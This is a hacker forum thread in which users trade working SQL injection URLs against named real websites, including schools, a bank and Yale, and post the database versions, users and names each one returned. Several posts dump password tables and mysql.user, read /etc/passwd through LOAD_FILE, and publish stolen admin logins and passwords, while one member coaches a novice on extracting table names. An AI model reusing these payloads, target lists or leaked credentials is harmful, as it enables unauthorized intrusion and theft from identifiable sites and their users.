SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. spherics

    A St. Petersburg internet cafe!

    http://www.shangrila-spb.ru/index.php?action=view&id=-73+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),4,5,6,7,8,9,10,11,12,13-- &module=newsmodule&src=%40random41940a897e943

    Database Version: 4.1.11-Debian_4sarge7-log
    Database name: shangrila
    User name: adminn@localhost

    For the kids to play with -)

    http://www.play-publishing.com/?id=72+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11--

    4.0.22
    majkel@play.play.com.pl
    musiccd

    Yandex TIC = 40
    PageRank = 5


    http://www.dorian.ru/catalog/dog.php?screen=1&id=-72+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12--

    5.0.67-log
    u26951@10.10.10.216
    u26951_catalog

    Yandex TIC = 275
     
  2. cash$$$

    Code:
    http://www.swschool.org/news_detail.php?id=-1+union+select+1,version(),user(),database()/*
    version: 4.1.20
    user: ssac@mrcrabs.toolbox.net
    database: ssac

    Code:
    http://articles.student.com/article.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14/*
    version: 4.0.21-standard-log
    user: webuser@web1
    database: studcent

    Code:
    http://www.opednews.com/maxwrite/link.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11/*
    version: 4.1.22-standard-log
    user: opednews_vidya@localhost
    database: opednews_pearl

    Code:
    http://energyteachers.org/ReadArticle.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/*
    version: 5.0.45-log
    user: etouser@205.178.145.65
    database: eto

    Code:
    http://www.calbank.net/newsite/products&services/index.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*
    version: 4.1.22-standard-log
    user: 334937_alfred@172.16.11.218
    database: 334937_calcms

    Code:
    http://rwjcsp.yale.edu/community.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
    version: 4.0.24-log
    user: rwjEditor@web.med.yale.edu
    database: rwj

    Code:
    http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13/*
    version: 4.0.27-standard-log
    user: dbo120565932@212.227.119.149
    database: db120565932

    Code:
    http://www.business-academy.ru/viezd.php?id=-1+union+select+1,version(),3,4,5/*
    version: 5.0.45-Max-log
    user: srv11037_forum21@c29-w.ht-systems.ru
    database: srv11037_forum

    user: lenar
    pass: vcxzasdf123

    Code:
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13/*
    version: 5.0.45-log
    user: oxid@localhost
    database: synaptic

    http://www.conex.biz.ua/auction.php?id=-1+union+select+1,version(),3/*

    version: 4.1.22-log
    user: conex@alpha
    database: conex
     
  3. vakula

    Folks, help a lamer!!!
    I found a vulnerability, 15 fields, but I can't figure out what to do next. I tried inserting all sorts of code, and I get an error everywhere. You try it... tell me where the mistake is.
     
  4. vakula

    http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
     
  5. ..::TROYAN::..

    PHP:
    Forbidden    You don't have permission to access / on this server.
    hmm...
     
  6. vakula

    That's our ISP's site... maybe you're simply not being let in.
     
  7. vakula

    http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17/*

    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/igor/public_html/megaload/program.php on line 121
     
  8. vakula

    That's it... thanks, everyone... I just stupidly missed where to put the query.
     
  9. vakula

    Folks, can you tell me how to pull out the table name to get the pass?

    http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
     
  10. Merl00k

    Forbidden, as in access denied
     
  11. R1dex

    Code:
    http://irp.poltava.ua/news.php?news_id=8546[sql]
    3rd branch...
    __________________________________________

    "DentArt Magazine"

    Code:
    http://www.dentart.org/rubriki.php?rubr=-1+union+select+1,2,version(),4--
    5.0.67-community
     
  12. vladvk

    synaptic.ru
    I finished working it out, but I haven't seen anything like this before, and I didn't bother figuring out what needs to go where:
    If anyone looks into it, please post back afterwards.
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(bank_account,char(58),bank_name,char(58),email,char(58),char(58),password),4,5,6,7,8,9,10,11,12,13+from+synaptic.users/*

    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+psy.users/*
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.users/*
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),email,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.opinion_users/*
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(host,char(58),port,char(58),user,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.ftp_servers/*
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.developers_app/*
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),email,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.author/*
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(Host,char(58),Password,char(58),User),4,5,6,7,8,9,10,11,12,13+from+mysql.user/*
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(Host,char(58),Db,char(58),User),4,5,6,7,8,9,10,11,12,13+from+mysql.db/*
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(email,char(58),password),4,5,6,7,8,9,10,11,12,13+from+malkov.users/*
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),password),4,5,6,7,8,9,10,11,12,13+from+identification.users+limit+0,1/*
     
  13. vakula

    Tell me please, how do I pull the table out of the link R1dex gave so that I can then look at the pass?
    Or throw me a link to some FAQ on this topic.
    I've searched everywhere... there's nothing like that. I just don't get why user and database are needed, what use are they?
     
  14. vakula

    Tell me please... where did you get the table names from!! It's already driving me crazy! Help a noob
     
  15. j0ker13

    http://www.cohenhillel.org/about/profile.php?pid=-379+union+select+concat_ws(0x7c,user(),database(),version()),2,3/*

    scully@localhost|scully|4.1.22

    2vakula: if I understood your question correctly, dig in the direction of information_schema to learn the table names, if the version is 5.....) and user() and database() don't carry any particular value) they'll only help if you have access to mysql.user)
     
  16. Thrasher88

    kino.com
    USER kino@lma671.siteprotect.com
    VERSION 4.0.12-standard
    DATABASE kino

    Google PR: 7
     
  17. spherics

    http://www.pangeaday.org/filmDetail.php?id=-72/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--

    Version:5.0.45-log
    User:dr30628@192.168.1.131
    Database:pangea


    PageRank = 7

    http://www.gsi.ru/catalog.php?id=-72+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11,12,13--

    Version:4.0.24_Debian-10sarge2
    User:root@localhost
    Database:gsi

    Yandex TIC = 800

    http://mympeg.ru/video.htm?id=-72+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,version(),user(),database()),11,12,13,14,15--

    Version:4.1.22-log
    User:mympeg@localhost
    Database:wwwmympeglggru

    PageRank = 5
     
    #7277 spherics, 4 Jan 2009
    Last edited: 4 Jan 2009
  18. Thrasher88

    bloggingheads.tv
    Pay attention to the output! :) Some may think there are no printable fields.. but if you look closely ;)..

    VERSION: 5.0.45-log
    USER brainwav@66.39.65.222
    DATABASE brainwav_bhtvee

    Admin login and pass: rw:exnihil0

    Google PR: 7
     
    #7278 Thrasher88, 4 Jan 2009
    Last edited: 4 Jan 2009
  19. spherics

    http://www.usp.br/internacional/home.php?id_cont=12345674+union+select+1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12,13,14,15--&idioma=en


    Database Version: 4.0.24_Debian-10sarge3-log
    Database name: w3internacional
    User name: w3internacional@localhost


    PageRank = 8





    http://www.skyalbum.com/showAlbum/222225368/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12,13,14,15--

    Version:5.0.22
    User:skyalbum_db_user@localhost
    Database:skyalbum


    PageRank = 7


    http://www.skyalbum.com/showAlbum/222225368//**/UNION/**/SELECT/**/1,2,3,4,5,6,CONCAT(0x7873716C696E6A626567696E,(SELECT/**/CONCAT(User,0x7873716C696E6A64656C,Password)/**/FROM/**/mysql.user/**/LIMIT/**/8,1),0x7873716C696E6A656E64),8,9,10,11,12,13,14,15--



    We read /etc/passwd and so on

    http://www.skyalbum.com/showAlbum/222225368//**/UNION/**/SELECT/**/1,2,3,4,5,6,CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F6574632F706173737764),0x7873716C696E6A656E64),8,9,10,11,12,13,14,15--




    http://www.specialradio.ru/p&d/?id=722222+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10--

    Version:4.1.22
    User:specialr_speci01@node1.hc.ru
    Database:wwwspecialradior_specialradio

    Yandex TIC = 1000
    PageRank = 6
     
    #7279 spherics, 4 Jan 2009
    Last edited: 4 Jan 2009
  20. ..::TROYAN::..

    Code:
    http://pointsonline.com/php/get_merchant_info.php?a=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3--
    loyalty@localhost:4.1.22-standard-log:loyalty
     